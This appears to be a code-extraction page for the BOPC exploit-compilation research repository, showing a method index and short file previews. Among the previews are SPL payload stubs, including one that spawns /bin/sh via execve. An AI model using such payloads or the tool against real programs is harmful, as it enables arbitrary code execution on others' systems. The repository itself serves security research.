    method __ooo_intrl (line 147) | def __ooo_intrl( self, stmt_l ):
    method __ooo (line 218) | def __ooo( self  ):
    method __label_remove (line 254) | def __label_remove( self ):
    method __rewrite (line 277) | def __rewrite( self ):
    method __future (line 300) | def __future( self ):
    method __init__ (line 316) | def __init__( self, ir ):
    method __getitem__ (line 333) | def __getitem__( self, idx ):
    method optimize (line 351) | def optimize( self, mode ):
    method itergroup (line 389) | def itergroup( self ):
    method get_ir (line 400) | def get_ir( self ):
    method emit (line 410) | def emit( self, filename ):

FILE: source/output.py
  class output (line 43) | class output( object ):
    method __init__ (line 53) | def __init__( self, fmt ):
    method comment (line 73) | def comment( self, comment ):
    method newline (line 83) | def newline( self ):
    method breakpoint (line 94) | def breakpoint( self, address ):
    method register (line 106) | def register( self, register, value, comment='' ):
    method memory (line 124) | def memory( self, address, value, size ):
    method external (line 140) | def external( self, line ):
    method alloc (line 152) | def alloc( self, varname, size ):
    method set (line 164) | def set( self, name, value ):
    method save (line 175) | def save( self, binary ):

FILE: source/path.py
  class _queue_obj (line 68) | class _queue_obj( object ):
    method __init__ (line 79) | def __init__( self, data, weight ):
    method __cmp__ (line 91) | def __cmp__( self, other ):
  class _cs_ksp_intrl (line 113) | class _cs_ksp_intrl( object ):
    method __get_precall_stack (line 128) | def __get_precall_stack( self, path, node=None ):
    method __init__ (line 164) | def __init__( self, graph, shortest_path_cb, f ):
    method k_shortest_paths (line 187) | def k_shortest_paths( self, source, destination, cur_uid, K ):
    method k_shortest_loops (line 348) | def k_shortest_loops( self, source, cur_uid, K ):
  class _cfg_shortest_path (line 428) | class _cfg_shortest_path( _cs_ksp_intrl ):
    method __valid_neighbors (line 440) | def __valid_neighbors( self, node ):
    method __depth_metric (line 673) | def __depth_metric( self, retns ):
    method __clob_stmts (line 703) | def __clob_stmts( self, cur_uid ):
    method __dijkstra_variant_rcsv (line 738) | def __dijkstra_variant_rcsv( self, root, finals=[], precall_stack=[], ...
    method __dijkstra_variant (line 1052) | def __dijkstra_variant( self, root, finals=[], cur_uid=-1, precall_sta...
    method __spur_shortest_path (line 1131) | def __spur_shortest_path( self, spur, dst, cur_uid=-1, precall_stack=[...
    method __init__ (line 1262) | def __init__( self, cfg, clobbering={ }, adj={ } ):
    method shortest_path (line 1294) | def shortest_path( self, src, dst, cur_uid=-1 ):
    method shortest_loop (line 1345) | def shortest_loop( self, src, cur_uid=-1 ):

FILE: source/search.py
  class search (line 45) | class search:
    method __remove_goto (line 60) | def __remove_goto( self, accepted, adj ):
    method __mk_adjacency_list (line 105) | def __mk_adjacency_list( self, stmt_l ):
    method __mk_reverse_adjacency_list (line 150) | def __mk_reverse_adjacency_list( self, adj ):
    method __shuffle (line 170) | def __shuffle( self, accepted ):
    method __enum_tree (line 255) | def __enum_tree( self, tree, simulation, path=[], prev_uid=-1, totpath...
    method __consistent_stashes (line 430) | def __consistent_stashes( self ):
    method __mapping_callback (line 524) | def __mapping_callback( self, regmap, varmap ):
    method __init__ (line 878) | def __init__( self, project, cfg, IR, entry, options ):
    method trace_searching (line 905) | def trace_searching( self, mark ):
    method raw_results (line 927) | def raw_results( self ):

FILE: source/simulate.py
  class simulate (line 91) | class simulate:
    method __sig_handler (line 105) | def __sig_handler( self, signum, frame ):
    method __in_constraints (line 124) | def __in_constraints( self, symv, state=None ):
    method __getreg (line 178) | def __getreg( self, reg, state=None ):
    method __mread (line 219) | def __mread( self, state, addr, length ):
    method __mwrite (line 247) | def __mwrite( self, state, addr, length, value ):
    method __get_permissions (line 271) | def __get_permissions( self, addr, length=1, state=None ):
    method __symv_in (line 320) | def __symv_in( self, symexpr, symv ):
    method __alloc_un (line 353) | def __alloc_un( self, state, symv ):
    method __init_mem (line 429) | def __init_mem( self, state, addr, length=MAX_MEM_UNIT_BYTES ):
    method __dbg_read_hook (line 490) | def __dbg_read_hook( self, state ):
    method __dbg_write_hook (line 555) | def __dbg_write_hook( self, state ):
    method __dbg_symv_hook (line 680) | def __dbg_symv_hook( self, state ):
    method __dbg_reg_wr_hook (line 703) | def __dbg_reg_wr_hook( self, state ):
    method __dbg_call_hook (line 783) | def __dbg_call_hook( self, state ):
    method __get_var_values (line 873) | def __get_var_values( self, variable ):
    method __pool_RSVP (line 890) | def __pool_RSVP( self, variable ):
    method __init_variable_rcsv (line 935) | def __init_variable_rcsv( self, variable, depth=0 ):
    method __init_vars (line 1028) | def __init_vars( self, varmap ):
    method __mem_RSVPs (line 1080) | def __mem_RSVPs( self, state, cur_blk, cur_uid ):
    method __simulate_subpath (line 1362) | def __simulate_subpath( self, sublen, subpath, mode ):
    method __init__ (line 1491) | def __init__( self, project, cfg, clobbering, adj, IR, regmap, varmap,...
    method __check_regsets (line 1643) | def __check_regsets( self, state=None ):
    method simulate_edge (line 1701) | def simulate_edge( self, currb, nextb, uid, loopback=False ):
    method finalize (line 1865) | def finalize( self ):
    method step (line 2022) | def step( self, stmt ):
    method clone (line 2132) | def clone( self, condreg ):
    method copy_locally (line 2225) | def copy_locally( self ):
    method update_globals (line 2255) | def update_globals( self ):
    method stash_context (line 2276) | def stash_context( self ):
    method drop_context_stash (line 2298) | def drop_context_stash( self ):
    method unstash_context (line 2320) | def unstash_context( self ):
    method constraints (line 2356) | def constraints( self ):
    method __make_relative (line 2367) | def __make_relative( self, addr ):
    method __is_relative (line 2428) | def __is_relative( self, addr ):
    method dump (line 2459) | def dump( self, output ):
Condensed preview — 44 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (623K chars).
[
  {
    "path": "README.md",
    "chars": 21414,
    "preview": "\n\n# Block Oriented Programming Compiler (BOPC)\n\n___\n\n\n## What is BOPC\n\n**NEW:** The talk from CCS'18 presentation is ava"
  },
  {
    "path": "evaluation/README.md",
    "chars": 662,
    "preview": "\n\n# Block Oriented Programming Compiler (BOPC)\n___\n\n\n### Vulnerable Application Overview\n\n\n| Application                "
  },
  {
    "path": "payloads/README.md",
    "chars": 1237,
    "preview": "\n\n# Block Oriented Programming Compiler (BOPC)\n___\n\n\n### SPL Payload Overview\n\n\n| Payload                  | Description"
  },
  {
    "path": "payloads/abloop.spl",
    "chars": 157,
    "preview": "// \n// BOPC Evaluation\n//\n// Arbitrary bounded loop with register modification\n//\nvoid payload() \n{ \n    __r0 = 0;\n\nLOOP"
  },
  {
    "path": "payloads/execve.spl",
    "chars": 245,
    "preview": "// \n// BOPC Evaluation\n//\n// execve('/bin/sh') payload\n//\nvoid payload() \n{ \n    string prog = \"/bin/sh\\0\";\n    int argv"
  },
  {
    "path": "payloads/ifelse.spl",
    "chars": 221,
    "preview": "// \n// BOPC Evaluation\n//\n// Simple if-else condition\n//\nvoid payload() \n{ \n    __r0 = 0;\n\n    if (__r0 != 0 ) goto SKIP"
  },
  {
    "path": "payloads/infloop.spl",
    "chars": 144,
    "preview": "// \n// BOPC Evaluation\n//\n// Infinity loop with constant assignment\n//\nvoid payload() \n{ \n\n//  __r0 = 1;\n\nLOOP:\n    __r1"
  },
  {
    "path": "payloads/loop.spl",
    "chars": 133,
    "preview": "// \n// BOPC Evaluation\n//\n// Simple loop\n//\nvoid payload() \n{ \n    __r0 = 0;\n\nLOOP:\n    __r0 += 1;\n\n    if (__r0 != 3 ) "
  },
  {
    "path": "payloads/memrd.spl",
    "chars": 142,
    "preview": "// \n// BOPC Evaluation\n//\n// Memory Load\n//\nvoid payload() \n{ \n    int array = {1, 2, 3, 4, 5};\n    \n    __r1 = &array;\n"
  },
  {
    "path": "payloads/memwr.spl",
    "chars": 157,
    "preview": "// \n// BOPC Evaluation\n//\n// Memory Store\n//\nvoid payload() \n{ \n    int array = {1, 2, 3, 4, 5};\n    \n    __r0 = &array;"
  },
  {
    "path": "payloads/print.spl",
    "chars": 258,
    "preview": "// \n// BOPC Evaluation\n//\n// Print an arbitrary message to stdout using write()\n//\nvoid payload() \n{ \n    string msg = \""
  },
  {
    "path": "payloads/regmod.spl",
    "chars": 105,
    "preview": "// \n// BOPC Evaluation\n//\n// Register modification\n//\nvoid payload() \n{ \n    __r0 = 0;\n\n    __r0 += 1;\n}\n"
  },
  {
    "path": "payloads/regref4.spl",
    "chars": 317,
    "preview": "// \n// BOPC Evaluation\n//\n// Initialize 4 registers with references\n//\nvoid payload() \n{ \n    int    var_a = 0x100;\n    "
  },
  {
    "path": "payloads/regref5.spl",
    "chars": 376,
    "preview": "// \n// BOPC Evaluation\n//\n// Initialize 5 registers with references\n//\nvoid payload() \n{ \n\tlong   var_a = 0x100;\n\tstring"
  },
  {
    "path": "payloads/regset4.spl",
    "chars": 132,
    "preview": "// \n// BOPC Evaluation\n//\n// Initialize 4 registers\n//\nvoid payload() \n{ \n    __r0 = 0;\n    __r1 = 1;\n    __r2 = 2;\n    "
  },
  {
    "path": "payloads/regset5.spl",
    "chars": 146,
    "preview": "// \n// BOPC Evaluation\n//\n// Initialize 5 registers\n//\nvoid payload() \n{ \n    __r0 = 0;\n    __r1 = 1;\n    __r2 = 2;\n    "
  },
  {
    "path": "setup.sh",
    "chars": 3402,
    "preview": "#!/bin/bash\n# -------------------------------------------------------------------------------------------------\n#\n#    ,"
  },
  {
    "path": "source/BOPC.py",
    "chars": 19762,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/README.md",
    "chars": 1247,
    "preview": "\n\n# Block Oriented Programming Compiler (BOPC)\n\n\n___\n\n### BOPC Implementation Overview\n\n![alt text](./images/BOPC_overvi"
  },
  {
    "path": "source/absblk.py",
    "chars": 54126,
    "preview": "#!/#!/usr/bin/env python2\n# --------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/calls.py",
    "chars": 6728,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/capability.py",
    "chars": 35590,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/compile.py",
    "chars": 44994,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/config.py",
    "chars": 7276,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/coreutils.py",
    "chars": 31393,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/delta.py",
    "chars": 30834,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/map.py",
    "chars": 24965,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/mark.py",
    "chars": 68589,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/optimize.py",
    "chars": 21088,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/output.py",
    "chars": 7075,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/path.py",
    "chars": 70022,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/search.py",
    "chars": 38663,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  },
  {
    "path": "source/simulate.py",
    "chars": 113380,
    "preview": "#!/usr/bin/env python2\n# -----------------------------------------------------------------------------------------------"
  }
]

// ... and 11 more files (download for full content)

About this extraction

This page contains the full source code of the HexHive/BOPC GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 44 files (590.8 KB), approximately 132.7k tokens, and a symbol index with 215 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.

Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.

Copied to clipboard!